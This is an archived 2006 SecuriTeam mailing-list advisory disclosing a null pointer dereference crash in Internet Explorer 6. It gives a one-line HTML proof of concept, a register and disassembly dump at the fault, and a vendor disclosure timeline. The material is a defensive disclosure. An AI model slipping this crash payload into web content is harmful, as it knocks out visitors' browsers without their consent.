Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NT] Internet Explorer Null Pointer Dereference DoS

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NT] Internet Explorer Null Pointer Dereference DoS
Date: 29 May 2006 17:08:07 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Internet Explorer Null Pointer Dereference DoS
------------------------------------------------------------------------


SUMMARY

Improper handling of HTML will cause a Null Pointer Dereference and crash 
Internet Explorer.

DETAILS

Vulnerable Systems:
 * Microsoft Internet Explorer version 6 SP2
 * Microsoft Internet Explorer version 6

When creating an empty applet tag prior to any other HTML tag without 
closing it, Internet explorer will have a Null Pointer result and it will 
crash.

Proof of Concept:
< applet >< h4 >< title > < / title >< base >

These are the register values and the ASM dump at the time of the access 
violation:
 eax=00000000 ebx=00000000 ecx=00e78d38 edx=00e7a704 esi=0012a268
 edi=00000000 eip=7d6d2db4 esp=0012a228 ebp=0012a25c

 7d6d2d7d e868f9ffff       call    mshtml+0x2226ea (7d6d26ea)
 7d6d2d82 50               push    eax
 7d6d2d83 e835f8ffff       call    mshtml+0x2225bd (7d6d25bd)
 7d6d2d88 85c0             test    eax,eax
 7d6d2d8a 8945f8           mov     [ebp-0x8],eax
 7d6d2d8d 0f85c4020000     jne     mshtml+0x223057 (7d6d3057)
 7d6d2d93 8b461c           mov     eax,[esi+0x1c]
 7d6d2d96 8b4e18           mov     ecx,[esi+0x18]
 7d6d2d99 8365f400         and     dword ptr [ebp-0xc],0x0
 7d6d2d9d 8365fc00         and     dword ptr [ebp-0x4],0x0
 7d6d2da1 8b7e14           mov     edi,[esi+0x14]
 7d6d2da4 8945f0           mov     [ebp-0x10],eax
 7d6d2da7 e88462e4ff       call    mshtml+0x69030 (7d519030)
 7d6d2dac 3bc7             cmp     eax,edi
 7d6d2dae 0f8402020000     je      mshtml+0x222fb6 (7d6d2fb6)
 FAULT ->7d6d2db4 8b07             mov     eax,[edi]
                        ds:0023:00000000=????????
 7d6d2db6 8bc8             mov     ecx,eax
 7d6d2db8 83e10f           and     ecx,0xf
 7d6d2dbb 49               dec     ecx
 7d6d2dbc 0f849c010000     je      mshtml+0x222f5e (7d6d2f5e)
 7d6d2dc2 49               dec     ecx
 7d6d2dc3 0f84b3000000     je      mshtml+0x222e7c (7d6d2e7c)
 7d6d2dc9 49               dec     ecx
 7d6d2dca 49               dec     ecx
 7d6d2dcb 746c             jz      mshtml+0x222e39 (7d6d2e39)
 7d6d2dcd 83e904           sub     ecx,0x4
 7d6d2dd0 0f85a5010000     jne     mshtml+0x222f7b (7d6d2f7b)
 7d6d2dd6 8bcf             mov     ecx,edi
 7d6d2dd8 e8482ffeff       call    mshtml+0x205d25 (7d6b5d25)
 7d6d2ddd 85c0             test    eax,eax
 7d6d2ddf 7430             jz      mshtml+0x222e11 (7d6d2e11)
 7d6d2de1 837e0400         cmp     dword ptr [esi+0x4],0x0

Vendor Status:
Microsoft Security Response Center - "The vulnerability will be fixed in 
an upcoming service pack."

Disclosure Timeline:
Feb 06 - Vulnerabilities discovered.
08 Mar 06 - Vendor contacted.
22 Mar 06 - Vendor confirmed vulnerabilities.
25 May 06 - Public release.


ADDITIONAL INFORMATION

The information has been provided by  <mailto:bugtraq@morph3us.org> Thomas 
Waldegger .
The original article can be found at:  
<http://morph3us.org/advisories/20060525-msie6-sp2-1.txt> 
http://morph3us.org/advisories/20060525-msie6-sp2-1.txt



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NT] Internet Explorer Null Pointer Dereference DoS, SecuriTeam <=
Previous by Date:  [EXPL] Speedy ASP Forum User Pass Change (Exploit), SecuriTeam
Next by Date:  [NT] Microsoft Internet Explorer Crash, SecuriTeam
Previous by Thread:  [EXPL] Speedy ASP Forum User Pass Change (Exploit), SecuriTeam
Next by Thread:  [NT] Microsoft Internet Explorer Crash, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]